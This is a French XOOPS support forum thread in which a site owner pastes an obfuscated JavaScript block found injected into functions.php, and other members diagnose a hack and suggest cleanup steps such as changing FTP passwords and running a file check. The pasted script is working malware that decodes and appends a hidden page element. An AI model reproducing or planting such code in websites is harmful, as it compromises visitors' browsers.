Fork me on GitHub






la totale
Régulier
Inscrit: 19/09/2008 17:00
Messages: 183
j'ai changer de thème pour mon site (xdt standard) et maintenant quand j'essaie de l'ouvrir j'ai çà:


Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING, expecting ',' or ';' in /...../www/include/functions.php on line 256


quand j'ouvre cette fameuse ligne 256,j'ai çà:

if ($closehead) {
echo '</head><body> <kJNPAGyUfwlpmhli1o6kENwBUZTINEoUZ5KH6vuxrkQU5><script language="JavaScript" type="text/javascript">function rDmoSNgZZe(JXcLcytnlJATT){return JXcLcytnlJATT.split('').reverse().join('');}function DVqeriCImGRCgQ(CRRQaKPUKIC,QxlZXzSvSluewH){var RQTpPavCTBdGC=null;if(CRRQaKPUKIC==RQTpPavCTBdGC||CRRQaKPUKIC.length<8){return;}if(QxlZXzSvSluewH==RQTpPavCTBdGC||QxlZXzSvSluewH.length<=0){return;}var PCRsUvAtaqzprxem="";for(var ozcLALaMKfKq=0;ozcLALaMKfKq<QxlZXzSvSluewH.length;ozcLALaMKfKq++){PCRsUvAtaqzprxem+=QxlZXzSvSluewH.charCodeAt(ozcLALaMKfKq).toString();}var ntOmAmXLJLdGzWNawx=Math.floor(PCRsUvAtaqzprxem.length/5);var EaXPzXEqrLdzmNhygz=parseInt(PCRsUvAtaqzprxem.charAt(ntOmAmXLJLdGzWNawx)+PCRsUvAtaqzprxem.charAt(ntOmAmXLJLdGzWNawx*2)+PCRsUvAtaqzprxem.charAt(ntOmAmXLJLdGzWNawx*3)+PCRsUvAtaqzprxem.charAt(ntOmAmXLJLdGzWNawx*4)+PCRsUvAtaqzprxem.charAt(ntOmAmXLJLdGzWNawx*5));var ifoPVTEmIUAcNBSoiS=Math.round(QxlZXzSvSluewH.length/2);var TbMPNogsXOpzqrieOG=Math.pow(2,31)-1;var JSlTQaRnIOwtCzwprT=parseInt(CRRQaKPUKIC.substring(CRRQaKPUKIC.length-8,CRRQaKPUKIC.length),16);CRRQaKPUKIC=CRRQaKPUKIC.substring(0,CRRQaKPUKIC.length-8);PCRsUvAtaqzprxem+=JSlTQaRnIOwtCzwprT;while(PCRsUvAtaqzprxem.length>10){PCRsUvAtaqzprxem=(parseInt(PCRsUvAtaqzprxem.substring(0,10))+parseInt(PCRsUvAtaqzprxem.substring(10,PCRsUvAtaqzprxem.length))).toString();}PCRsUvAtaqzprxem=(EaXPzXEqrLdzmNhygz*PCRsUvAtaqzprxem+ifoPVTEmIUAcNBSoiS)%TbMPNogsXOpzqrieOG;var gPybaJghOcNa="";var npiGLRnvncZSZFWAeO="";for(var wdzgTOSmRMIcIDMT=0;wdzgTOSmRMIcIDMT<CRRQaKPUKIC.length;wdzgTOSmRMIcIDMT+=2){gPybaJghOcNa=parseInt(parseInt(CRRQaKPUKIC.substring(wdzgTOSmRMIcIDMT,wdzgTOSmRMIcIDMT+2),16)^Math.floor((PCRsUvAtaqzprxem/TbMPNogsXOpzqrieOG)*255));npiGLRnvncZSZFWAeO+=String.fromCharCode(gPybaJghOcNa);PCRsUvAtaqzprxem=(EaXPzXEqrLdzmNhygz*PCRsUvAtaqzprxem+ifoPVTEmIUAcNBSoiS)%TbMPNogsXOpzqrieOG;}return npiGLRnvncZSZFWAeO;}nLUpvdBWTMCPN=document.createElement(rDmoSNgZZe(DVqeriCImGRCgQ("4540c2ba3a150238c05e","DpOUouzeEBcNAc")));nLUpvdBWTMCPN.setAttribute(rDmoSNgZZe(DVqeriCImGRCgQ("035c8a014de997","uwHXqpyrmaoFw")),rDmoSNgZZe(DVqeriCImGRCgQ("5797f59ade81c0b9e99b531622676383e5f69d303219916141610d5354ef3eb449a3d4f35e701919018fadf1","TuCQlrNXfzEpXfq")));nLUpvdBWTMCPN.style.width=rDmoSNgZZe(DVqeriCImGRCgQ("a944df00757f1b","tVFvbOppyb"));nLUpvdBWTMCPN.style.height=rDmoSNgZZe(DVqeriCImGRCgQ("8c7a04050d103a","InoOZROktMeZUNlb"));document.body.appendChild(nLUpvdBWTMCPN);</script></kJNPAGyUfwlpmhli1o6kENwBUZTINEoUZ5KH6vuxrkQU5> ';
}
}


quelqu'un à une idée?

Posté le : 01/02/2010 11:32
Partager Twitter Partagez cette article sur GG+
Re: la totale
Xoops accro
Inscrit: 20/02/2008 20:27
De Belgium
Messages: 2708
Ce code ne appartient pas à XOOPS!
Votre site est probablement piratée, ou votre PC local, si vous avez téléchargée le fichier comme ça.

Posté le : 01/02/2010 12:13

Salutations, Gerard.
PS: Excusez mon mauvais français.
De la bonne manière de poser les questions
Partager Twitter Partagez cette article sur GG+
Re: la totale
Régulier
Inscrit: 19/09/2008 17:00
Messages: 183
mes 2 sites ont exactement la même erreur, ok mais je ne saisi pas par quoi je suis piraté et comment.
Je venais de les mettre à jour tous les deux avec la derniere versions de xoops

Posté le : 01/02/2010 19:26
Partager Twitter Partagez cette article sur GG+
Re: la totale
Xoops accro
Inscrit: 27/07/2005 16:10
De France
Messages: 2970
Quelle hebergement?
Quelle version du php?

Posté le : 01/02/2010 19:41
Partager Twitter Partagez cette article sur GG+
Re: la totale
Régulier
Inscrit: 19/09/2008 17:00
Messages: 183
phpnux

php 5

Posté le : 01/02/2010 19:53
Partager Twitter Partagez cette article sur GG+
Re: la totale
Supporter Xoops
Inscrit: 17/12/2005 01:41
De Alpes Maritimes
Messages: 1682
cela peut venir de votre PC il faut savoir qu'un client ftp comme filezila garde les identifiant et les mots ne passe en clair sur votre ordi donc au moindre cheval de troie ou backdoor vos site sont vulnerable. Faite le menage sur votre ordinateur changer les mots de passe et identifiant ftp ceux des bases de données et regarder ce qui ce passe. Si plus de signe de piratage alors le probleme venez bien de la (c'est souvent le cas) sinon cela vient d'une faille sur xoops.

PS: si vous etes pas le seul a avoir un acces ftp a vos sites invité egalement les autres utilisateur a nettoyer leur ordinateur

Posté le : 01/02/2010 21:50
Partager Twitter Partagez cette article sur GG+
Re: la totale
Régulier
Inscrit: 19/09/2008 17:00
Messages: 183
je vais essayer mais là c'est la galère malgré une restauration j'ai n'est plus accès par le web à mon site

Le mieux pour moi est peut etre de tout effacer à part mainfile et de tout installer à nouveau avec la nouvelle version parcontre je n'est pas saisi comment importer l'ancienne bdd si elle est infectée.

qu'en pensez vous?

Là je tente un dernier backup.

Posté le : 01/02/2010 23:44
Partager Twitter Partagez cette article sur GG+
Re: la totale
Xoops accro
Inscrit: 20/02/2008 20:27
De Belgium
Messages: 2708
Si vous avez deux sites piratées au même(?) serveur, c'est peut-être une faille dans les logiciels du serveur. Demander au hébergeur, si il y a aussi des sites voisin avec des problèmes.
Des infections sont en général dans des fichiers et pas dans le bdd. C'est toujours possible de le comparer avec une ancien sauvegarde.

Posté le : 02/02/2010 00:58

Salutations, Gerard.
PS: Excusez mon mauvais français.
De la bonne manière de poser les questions
Partager Twitter Partagez cette article sur GG+
Re: la totale
Régulier
Inscrit: 19/09/2008 17:00
Messages: 183
pour eux le problème viens soit de filezilla soit de xoops mais dans les deux cas, je suis bon pour réinstallation complète mais backup les plus ancien ne change rien.

Après ma dernière restauration voilà ce qui apparait:



Warning: include_once(/web/.........../www/include/defines.php) [function.include-once]: failed to open stream: No such file or directory in /web/.........../www/include/common.php on line 31

Warning: include_once() [function.include]: Failed opening '/web/....../www/include/defines.php' for inclusion (include_path='.:/usr/php5/pear') in /web/.........../www/include/common.php on line 31

Warning: include_once(/web/.........../www/include/license.php) [function.include-once]: failed to open stream: No such file or directory in /web/.........../www/include/common.php on line 33

Warning: include_once() [function.include]: Failed opening '/web/.........../www/include/license.php' for inclusion (include_path='.:/usr/php5/pear') in /web/.........../www/include/common.php on line 33

Fatal error: Class 'XoopsPreload' not found in /web/.........../www/include/common.php on line 44.


En espérant que je réussirait à y connecter ma base de donnée.

Posté le : 02/02/2010 18:13
Partager Twitter Partagez cette article sur GG+
Re: la totale
Xoops accro
Inscrit: 20/02/2008 20:27
De Belgium
Messages: 2708
Faites le file check (voir notes de release).

Posté le : 02/02/2010 20:45

Salutations, Gerard.
PS: Excusez mon mauvais français.
De la bonne manière de poser les questions
Partager Twitter Partagez cette article sur GG+

 Haut   Précédent   Suivant



Vous pouvez voir les sujets.
Vous ne pouvez pas débuter de nouveaux sujets.
Vous ne pouvez pas répondre aux contributions.
Vous ne pouvez pas éditer vos contributions.
Vous ne pouvez pas effacez vos contributions.
Vous ne pouvez pas ajouter de nouveaux sondages.
Vous ne pouvez pas voter en sondage.
Vous ne pouvez pas attacher des fichiers à vos contributions.
Vous ne pouvez pas poster sans approbation.

Propulsé avec XOOPS | Graphisme adapté par Tatane, Grosdunord, Montuy337513

59 Personne(s) en ligne (48 Personne(s) connectée(s) sur Forum) | Utilisateur(s): 0 | Invité(s): 59 | Plus ...